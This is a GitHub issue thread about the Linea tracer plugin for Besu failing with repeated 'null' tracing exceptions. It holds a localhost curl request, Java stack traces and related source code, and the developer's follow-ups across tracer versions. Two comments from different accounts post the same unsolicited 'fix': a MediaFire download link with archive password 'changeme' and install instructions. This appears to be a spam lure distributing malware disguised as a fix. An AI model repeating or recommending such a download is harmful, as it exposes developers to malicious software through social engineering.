### ISSUE TITLE
Exceptions triggered while tracing NULL (failed worldstate query)

### ISSUE THREAD

**Issue by gusiri** [Consensys/besu-sequencer-plugins#989]
conflation: `2250197-2250197` 

environment:
version: `tracer v0.5.0-beta`
related plugin: `GenerateConflatedTracesV2`
run`linea_generateConflatedTracesToFileV2` on `besu-node` 

related issues:
https://github.com/Consensys/linea-tracer/issues/900
https://github.com/Consensys/linea-tracer/issues/898

```
time curl --location --request POST 'http://localhost:15480' --header 'Content-Type: application/json' --data-raw '{"jsonrpc": "2.0","method": "linea_generateConflatedTracesToFileV2","params": [{"startBlockNumber": 2250197,"endBlockNumber": 2250197,"expectedTracesEngineVersion": "v0.5.0-beta"}],"id": 1}'



{"jsonrpc":"2.0","id":1,"error":{"code":-32603,"message":"Plugin internal error","data":"Exceptions triggered while tracing:\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n"}}curl --location --request POST  --header 'Content-Type: application/json'    0.01s user 0.01s system 1% cpu 0.903 total
```

Error message:
```
06:57:18.712 [vert.x-worker-thread-7] ERROR org.hyperledger.besu.ethereum.api.query.BlockchainQueries - failed worldstate query for 0x763730df5c43979c6dd19f1da750482a303b45c87c4448b2d4a50222a1ff84ae
net.consensys.linea.zktracer.ZkTracer$TracingExceptions: Exceptions triggered while tracing:
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null
  - null

        at net.consensys.linea.zktracer.ZkTracer.traceEndConflation(ZkTracer.java:184) ~[?:?]
        at org.hyperledger.besu.services.TraceServiceImpl.lambda$trace$3(TraceServiceImpl.java:166) ~[besu-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.lambda$processTracing$0(Tracer.java:51) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.query.BlockchainQueries.lambda$getAndMapWorldState$24(BlockchainQueries.java:950) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.Optional.flatMap(Optional.java:289) ~[?:?]
        at org.hyperledger.besu.ethereum.api.query.BlockchainQueries.getAndMapWorldState(BlockchainQueries.java:946) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.lambda$processTracing$1(Tracer.java:49) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.Optional.flatMap(Optional.java:289) ~[?:?]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.processTracing(Tracer.java:47) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.processTracing(Tracer.java:37) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.services.TraceServiceImpl.trace(TraceServiceImpl.java:154) ~[besu-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at net.consensys.linea.plugins.rpc.tracegeneration.GenerateConflatedTracesV2.execute(GenerateConflatedTracesV2.java:87) ~[?:?]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.methods.PluginJsonRpcMethod.response(PluginJsonRpcMethod.java:50) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.BaseJsonRpcProcessor.process(BaseJsonRpcProcessor.java:44) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.TracedJsonRpcProcessor.process(TracedJsonRpcProcessor.java:54) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.TimedJsonRpcProcessor.process(TimedJsonRpcProcessor.java:45) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.JsonRpcExecutor.execute(JsonRpcExecutor.java:92) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.handlers.AbstractJsonRpcExecutor.executeRequest(AbstractJsonRpcExecutor.java:87) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.handlers.JsonRpcObjectExecutor.execute(JsonRpcObjectExecutor.java:57) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.handlers.JsonRpcExecutorHandler.lambda$handler$0(JsonRpcExecutorHandler.java:57) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.Optional.ifPresentOrElse(Optional.java:196) ~[?:?]
        at org.hyperledger.besu.ethereum.api.handlers.JsonRpcExecutorHandler.lambda$handler$2(JsonRpcExecutorHandler.java:54) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at io.vertx.ext.web.impl.BlockingHandlerDecorator.lambda$handle$0(BlockingHandlerDecorator.java:48) ~[vertx-web-4.5.8.jar:4.5.8]
        at io.vertx.core.impl.ContextImpl.lambda$executeBlocking$1(ContextImpl.java:191) ~[vertx-core-4.5.8.jar:4.5.8]
        at io.vertx.core.impl.ContextInternal.dispatch(ContextInternal.java:279) ~[vertx-core-4.5.8.jar:4.5.8]
        at io.vertx.core.impl.ContextImpl.lambda$internalExecuteBlocking$2(ContextImpl.java:210) ~[vertx-core-4.5.8.jar:4.5.8]
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144) ~[?:?]
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642) ~[?:?]
        at io.netty.util.concurrent.FastThreadLocalRunnable.run(FastThreadLocalRunnable.java:30) ~[netty-common-4.1.110.Final.jar:4.1.110.Final]
        at java.base/java.lang.Thread.run(Thread.java:1583) [?:?]
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gusiri** [comment]
related besu code:
```
  /**
   * Wraps an operation on MutableWorldState with try-with-resources the corresponding block hash.
   * This method provides access to the worldstate via a mapper function in order to ensure all of
   * the uses of the MutableWorldState are subsequently closed, via the try-with-resources block.
   *
   * @param <U> return type of the operation on the MutableWorldState
   * @param blockHash the block hash
   * @param mapper Function which performs an operation on a MutableWorldState
   * @return the world state at the block number
   */
  public <U> Optional<U> getAndMapWorldState(
      final Hash blockHash, final Function<MutableWorldState, ? extends Optional<U>> mapper) {

    return blockchain
        .getBlockHeader(blockHash)
        .flatMap(
            blockHeader -> {
              try (var ws = worldStateArchive.getMutable(blockHeader, false).orElse(null)) {
                if (ws != null) {
                  return mapper.apply(ws);
                }
              } catch (Exception ex) {
                LOG.error("failed worldstate query for " + blockHash.toShortHexString(), ex);
              }
              LOG.atDebug()
                  .setMessage("Failed to find worldstate for {}")
                  .addArgument(blockHeader.toLogString())
                  .log();
              return Optional.empty();
            });
  }
```

**Comment by gusiri** [comment]
related methods: 

- ZkTracer.java
```
 @Override
  public void traceEndConflation(final WorldView state) {
    try {
      this.hub.traceEndConflation(state);
      this.pin55.ifPresent(Pin55::traceEndConflation);
    } catch (final Exception e) {
      this.tracingExceptions.add(e);
    }

    if (!this.tracingExceptions.isEmpty()) {
      throw new TracingExceptions(this.tracingExceptions);
    }
  }
```

- Hub.java
```
  @Override
  public void traceEndConflation(final WorldView state) {
    this.defers.runPostConflation(this, state);

    for (Module m : this.modules) {
      m.traceEndConflation(state);
    }
  }

```

**Comment by gusiri** [comment]
Resolved by some new fixes in the latest tracer (v0.5.0-beta) 
https://github.com/Consensys/linea-tracer/issues/900#issuecomment-2312598606

**Comment by gusiri** [comment]
We still have these errors (v0.5.1) 
```
5104800-5104883
{"jsonrpc":"2.0","id":1,"error":{"code":-32603,"message":"Plugin internal error","data":"Exceptions triggered while tracing:\n  - null\n"}}


5105646-5105728
{"jsonrpc":"2.0","id":1,"error":{"code":-32603,"message":"Plugin internal error","data":"Exceptions triggered while tracing:\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n  - null\n"}}


5106538-5106638
{"jsonrpc":"2.0","id":1,"error":{"code":-32603,"message":"Plugin internal error","data":"Exceptions triggered while tracing:\n  - null\n  - null\n"}}
```




```
net.consensys.linea.zktracer.ZkTracer$TracingExceptions: Exceptions triggered while tracing:
  - null

        at net.consensys.linea.zktracer.ZkTracer.traceEndConflation(ZkTracer.java:184) ~[?:?]
        at org.hyperledger.besu.services.TraceServiceImpl.lambda$trace$3(TraceServiceImpl.java:166) ~[besu-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.lambda$processTracing$0(Tracer.java:51) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.query.BlockchainQueries.lambda$getAndMapWorldState$24(BlockchainQueries.java:950) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.Optional.flatMap(Optional.java:289) ~[?:?]
        at org.hyperledger.besu.ethereum.api.query.BlockchainQueries.getAndMapWorldState(BlockchainQueries.java:946) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.lambda$processTracing$1(Tracer.java:49) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.Optional.flatMap(Optional.java:289) ~[?:?]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.processTracing(Tracer.java:47) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.processTracing(Tracer.java:37) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.services.TraceServiceImpl.trace(TraceServiceImpl.java:154) ~[besu-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at net.consensys.linea.plugins.rpc.tracegeneration.GenerateConflatedTracesV2.execute(GenerateConflatedTracesV2.java:87) ~[?:?]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.methods.PluginJsonRpcMethod.response(PluginJsonRpcMethod.java:50) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.BaseJsonRpcProcessor.process(BaseJsonRpcProcessor.java:44) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.TracedJsonRpcProcessor.process(TracedJsonRpcProcessor.java:54) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.TimedJsonRpcProcessor.process(TimedJsonRpcProcessor.java:45) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.JsonRpcExecutor.execute(JsonRpcExecutor.java:92) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.handlers.AbstractJsonRpcExecutor.executeRequest(AbstractJsonRpcExecutor.java:87) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.handlers.JsonRpcObjectExecutor.execute(JsonRpcObjectExecutor.java:57) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.handlers.JsonRpcExecutorHandler.lambda$handler$0(JsonRpcExecutorHandler.java:57) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.Optional.ifPresentOrElse(Optional.java:196) ~[?:?]
        at org.hyperledger.besu.ethereum.api.handlers.JsonRpcExecutorHandler.lambda$handler$2(JsonRpcExecutorHandler.java:54) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at io.vertx.ext.web.impl.BlockingHandlerDecorator.lambda$handle$0(BlockingHandlerDecorator.java:48) ~[vertx-web-4.5.8.jar:4.5.8]
        at io.vertx.core.impl.ContextImpl.lambda$executeBlocking$1(ContextImpl.java:191) ~[vertx-core-4.5.8.jar:4.5.8]
        at io.vertx.core.impl.ContextInternal.dispatch(ContextInternal.java:279) ~[vertx-core-4.5.8.jar:4.5.8]
        at io.vertx.core.impl.ContextImpl.lambda$internalExecuteBlocking$2(ContextImpl.java:210) ~[vertx-core-4.5.8.jar:4.5.8]
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144) ~[?:?]
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642) ~[?:?]
        at io.netty.util.concurrent.FastThreadLocalRunnable.run(FastThreadLocalRunnable.java:30) ~[netty-common-4.1.110.Final.jar:4.1.110.Final]
        at java.base/java.lang.Thread.run(Thread.java:1583) [?:?]
19:37:43.337 [vert.x-worker-thread-3] INFO  net.consensys.linea.plugins.rpc.tracegeneration.GenerateConflatedTracesV2 - [TRACING] trace for 5104800-5104883 computed in 2.720 min
19:37:43.337 [vert.x-worker-thread-3] ERROR net.consensys.linea.zktracer.ZkTracer - First exception that was caught while tracing:
java.lang.IllegalArgumentException: null
        at com.google.common.base.Preconditions.checkArgument(Preconditions.java:129) ~[guava-33.0.0-jre.jar:?]
        at net.consensys.linea.zktracer.module.hub.Hub.exitDeploymentFromDeploymentInfoPointOfView(Hub.java:714) ~[?:?]
        at net.consensys.linea.zktracer.module.hub.Hub.traceContextExit(Hub.java:662) ~[?:?]
        at net.consensys.linea.zktracer.ZkTracer.traceContextExit(ZkTracer.java:311) ~[?:?]
        at org.hyperledger.besu.evm.processor.AbstractMessageProcessor.process(AbstractMessageProcessor.java:219) ~[besu-evm-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.mainnet.MainnetTransactionProcessor.process(MainnetTransactionProcessor.java:607) ~[besu-core-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.mainnet.MainnetTransactionProcessor.processTransaction(MainnetTransactionProcessor.java:457) ~[besu-core-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.mainnet.MainnetTransactionProcessor.processTransaction(MainnetTransactionProcessor.java:229) ~[besu-core-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.services.TraceServiceImpl.lambda$trace$6(TraceServiceImpl.java:214) ~[besu-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.ArrayList.forEach(ArrayList.java:1596) ~[?:?]
        at org.hyperledger.besu.services.TraceServiceImpl.trace(TraceServiceImpl.java:200) ~[besu-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.services.TraceServiceImpl.lambda$trace$2(TraceServiceImpl.java:164) ~[besu-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.lang.Iterable.forEach(Iterable.java:75) ~[?:?]
        at org.hyperledger.besu.services.TraceServiceImpl.lambda$trace$3(TraceServiceImpl.java:162) ~[besu-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.lambda$processTracing$0(Tracer.java:51) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.query.BlockchainQueries.lambda$getAndMapWorldState$24(BlockchainQueries.java:950) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.Optional.flatMap(Optional.java:289) ~[?:?]
        at org.hyperledger.besu.ethereum.api.query.BlockchainQueries.getAndMapWorldState(BlockchainQueries.java:946) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.lambda$processTracing$1(Tracer.java:49) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.Optional.flatMap(Optional.java:289) ~[?:?]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.processTracing(Tracer.java:47) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.processor.Tracer.processTracing(Tracer.java:37) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.services.TraceServiceImpl.trace(TraceServiceImpl.java:154) ~[besu-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at net.consensys.linea.plugins.rpc.tracegeneration.GenerateConflatedTracesV2.execute(GenerateConflatedTracesV2.java:87) ~[?:?]
        at org.hyperledger.besu.ethereum.api.jsonrpc.internal.methods.PluginJsonRpcMethod.response(PluginJsonRpcMethod.java:50) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.BaseJsonRpcProcessor.process(BaseJsonRpcProcessor.java:44) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.TracedJsonRpcProcessor.process(TracedJsonRpcProcessor.java:54) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.TimedJsonRpcProcessor.process(TimedJsonRpcProcessor.java:45) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.jsonrpc.execution.JsonRpcExecutor.execute(JsonRpcExecutor.java:92) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.handlers.AbstractJsonRpcExecutor.executeRequest(AbstractJsonRpcExecutor.java:87) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.handlers.JsonRpcObjectExecutor.execute(JsonRpcObjectExecutor.java:57) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at org.hyperledger.besu.ethereum.api.handlers.JsonRpcExecutorHandler.lambda$handler$0(JsonRpcExecutorHandler.java:57) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at java.base/java.util.Optional.ifPresentOrElse(Optional.java:196) ~[?:?]
        at org.hyperledger.besu.ethereum.api.handlers.JsonRpcExecutorHandler.lambda$handler$2(JsonRpcExecutorHandler.java:54) ~[besu-api-24.8-develop-dce796c.jar:24.8-develop-dce796c]
        at io.vertx.ext.web.impl.BlockingHandlerDecorator.lambda$handle$0(BlockingHandlerDecorator.java:48) ~[vertx-web-4.5.8.jar:4.5.8]
        at io.vertx.core.impl.ContextImpl.lambda$executeBlocking$1(ContextImpl.java:191) ~[vertx-core-4.5.8.jar:4.5.8]
        at io.vertx.core.impl.ContextInternal.dispatch(ContextInternal.java:279) ~[vertx-core-4.5.8.jar:4.5.8]
        at io.vertx.core.impl.ContextImpl.lambda$internalExecuteBlocking$2(ContextImpl.java:210) ~[vertx-core-4.5.8.jar:4.5.8]
        at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144) ~[?:?]
        at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642) ~[?:?]
        at io.netty.util.concurrent.FastThreadLocalRunnable.run(FastThreadLocalRunnable.java:30) ~[netty-common-4.1.110.Final.jar:4.1.110.Final]
        at java.base/java.lang.Thread.run(Thread.java:1583) [?:?]
```

**Comment by gusiri** [comment]
opened another issue https://github.com/Consensys/linea-tracer/issues/1041
since the new null error doesn't include `failed worldstate query` msg.
